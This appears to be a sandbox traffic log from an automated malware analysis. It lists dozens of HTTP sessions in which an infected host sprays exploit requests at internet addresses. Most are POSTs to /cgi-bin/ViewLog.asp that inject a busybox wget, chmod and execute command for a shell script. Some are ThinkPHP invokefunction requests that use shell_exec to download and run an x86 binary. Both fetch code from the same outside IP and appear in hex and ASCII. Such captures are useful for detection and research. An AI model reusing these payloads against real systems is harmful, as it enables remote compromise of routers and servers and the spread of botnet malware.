Feb 14, 2024 09:29:23.514317036 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:24.858248949 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:27.578205109 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:32.954062939 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:43.705745935 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:06.489063978 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:49.495951891 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
222	192.168.2.15	36712	94.122.195.77	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:22.860575914 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
223	192.168.2.15	43256	85.94.171.205	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:24.271420002 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:24.544038057 CET	193	IN	HTTP/1.1 307 LOCATION: https://192.168.0.14:80/cgi-bin/ViewLog.asp X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
224	192.168.2.15	50154	95.141.98.35	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:24.278220892 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:24.493364096 CET	492	IN	HTTP/1.1 404 Not Found Date: Wed, 14 Feb 2024 08:21:19 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8o PHP/5.3.8-ZS5.5.0 Content-Length: 217 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
225	192.168.2.15	44228	95.216.120.105	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:24.284677029 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:24.505455017 CET	614	IN	HTTP/1.1 404 Content-Type: text/html;charset=utf-8 Content-Language: en Content-Length: 431 Date: Wed, 14 Feb 2024 08:29:24 GMT Keep-Alive: timeout=5 Connection: keep-alive Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
226	192.168.2.15	59564	94.121.176.134	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:24.312619925 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
227	192.168.2.15	55698	62.29.58.197	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:24.314024925 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
228	192.168.2.15	41762	94.120.221.146	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:24.314158916 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
229	192.168.2.15	53480	94.121.30.81	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:24.314313889 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
230	192.168.2.15	40226	95.86.116.196	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:24.315833092 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
231	192.168.2.15	33542	95.210.96.55	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:24.411293983 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
232	192.168.2.15	44210	95.216.93.49	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:24.436193943 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:24.658027887 CET	632	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:29:24 GMT Server: Apache/2.4.51 (Linux/SUSE) Content-Length: 434 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 31 20 28 4c 69 6e 75 78 2f 53 55 53 45 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 61 65 2d 6f 6e 6c 69 6e 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 400 Bad Requesterror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.51 (Linux/SUSE) Server at www.ae-online.com Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
233	192.168.2.15	42774	62.28.117.31	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:24.494396925 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:24.707345009 CET	410	IN	HTTP/1.1 404 Not Found Date: Wed, 14 Feb 2024 08:29:23 GMT Server: web X-Frame-Options: SAMEORIGIN Cache-Control: no-cache Content-Length: 166 Content-Type: text/html Connection: keep-alive Keep-Alive: timeout=60, max=99 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
234	192.168.2.15	53526	94.120.37.12	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:24.560398102 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
235	192.168.2.15	40746	62.29.40.161	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:24.561873913 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
236	192.168.2.15	46918	95.101.3.191	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:24.633960009 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:24.832004070 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Wed, 14 Feb 2024 08:29:24 GMT Date: Wed, 14 Feb 2024 08:29:24 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 37 37 62 30 66 37 34 38 26 23 34 36 3b 31 37 30 37 38 39 39 33 36 34 26 23 34 36 3b 39 62 61 36 65 37 32 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.77b0f748.1707899364.9ba6e72</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
237	192.168.2.15	35212	95.101.47.91	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:24.641128063 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
